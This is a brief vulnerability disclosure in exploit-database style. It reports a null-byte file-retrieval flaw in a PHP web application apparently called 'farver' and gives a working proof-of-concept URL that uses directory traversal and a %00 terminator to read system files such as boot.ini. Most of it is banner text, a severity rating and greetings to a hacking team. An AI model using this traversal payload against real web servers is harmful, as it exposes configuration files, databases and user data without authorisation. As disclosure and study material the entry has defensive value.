################################################################
################################################################
################################################################
################################################################
Author: Beenu Arora
Address: www.beenuarora.com
################################################################
#Python Dark Scripts: www.beenuarora.com/work.html
################################################################
#Date Found: 21/08/08
#Severity: High
#Security Risk:Null Byte Files Retrieval
#Explaination:It is possible to view the contents of any file (e.g. databases, user information or
configuration files) on the web server (under the permission restrictions of the web server user)
#POC: http://localhost/farver/index.php?c=/../../../../../../../../boot.ini%00
#For the POC pic visit: www.beenuarora.com/POC.bmp
################################################################
|Greetz: D3hydr8,rascal,rsauron,patrick,baltazar,sinner_01 and rest of team memebers. |
|_____________________________________________________________________________________|